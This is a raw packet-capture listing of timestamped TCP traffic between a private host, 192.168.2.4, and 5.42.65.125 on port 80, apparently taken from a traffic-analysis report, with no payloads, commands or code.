Dec 27, 2023 18:12:25.307933092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307939053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307967901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307991982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307998896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308011055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308036089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308069944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308094978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308100939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308108091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308114052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308120012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308136940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308146000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308168888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308185101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308195114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308202028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308238029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308252096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308259010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308269978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308298111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308324099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308331013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308366060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308725119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308765888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308851957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308859110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308871031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308876991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308885098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308891058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308897972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308901072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308933973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308936119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.308942080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.308974981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309406996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309415102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309422016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309427977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309434891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309448004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309484005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309509039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309514999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309525967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309533119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309539080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309550047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309554100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309561968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309578896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309585094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309623003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309629917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309638023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309643984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309649944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309657097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309669018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309674978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.309678078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309705019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.309720039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310264111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310313940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310405970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310412884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310415983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310427904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310446024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310446024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310453892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310465097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310492039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310514927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310533047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310539007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310561895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310585976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310604095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310616970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310645103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310709000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310745955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310753107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310760021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310790062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310806036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.310895920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310920000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310935020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310954094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.310956001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311011076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311342001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311350107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311357021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311383009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311395884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311403990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311435938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311440945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311444044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311476946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311495066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311534882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311537981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311758995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311795950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311803102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311815023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311820984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311841965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311865091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311876059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311882019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311888933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311896086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311918020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.311929941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.311934948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312040091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312047005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312052965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312058926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312066078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312077045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312083960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312087059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312089920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312102079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312108994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312114000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312134981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312158108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312170982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312621117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312634945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312640905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312647104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312661886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312669039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312674046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312690020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312705994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312877893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312886000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312891960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312897921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312905073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312916994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312922955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312922955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312931061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312942982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312949896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312952995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312963009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312967062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312968969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312980890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312988043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.312990904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.312997103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313009977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313028097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313514948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313523054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313564062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313601017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313607931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313613892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313621044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313627958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313644886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313668966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313680887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313885927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313910961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313920975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.313961029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.313967943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314007998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314023018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314080000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314085007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314086914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314099073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314106941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314117908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314125061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314137936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314145088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314155102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314168930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314176083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314182043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314182997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314193964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314199924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314202070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314207077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314214945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314220905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314223051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314228058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314254999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314285994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.314938068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314990044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.314996004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315009117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315036058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315036058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315062046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315068960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315104961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315120935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315128088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315161943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315184116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315191984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315201998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315207958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315215111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315228939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315253019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315258026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315274954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315280914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315288067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315294027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315316916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315325975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315346956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315356970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315365076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315797091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315838099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.315856934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315875053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315963030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315970898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315982103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315989017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.315995932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.316010952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.316041946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378637075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378650904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378703117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378781080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378787994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378798962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378802061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378808975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378814936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378823996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378828049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378837109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378843069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378849030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378849983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378861904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378880978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378894091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.378983974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.378992081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379003048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379009962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379018068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379029036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379031897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379034996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379057884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379060984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379066944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379072905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379081011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379087925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379097939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379098892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379126072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379152060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379188061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379223108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379267931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379276037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379287004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379293919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379311085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379337072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379354000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379371881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379379988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379395962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379422903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379493952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379501104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379508018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379514933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379532099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379534960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379554033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379558086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379600048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379607916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379642010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379664898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379672050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379684925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379692078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.379708052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.379730940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380150080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380156994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380163908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380171061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380182981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380189896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380199909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380202055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380208969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380215883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380222082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380235910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380260944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380275011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380321026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380331993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380340099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380347013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380357981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380357981 CET	49738	80	192.168.2.4	5.42.65.125
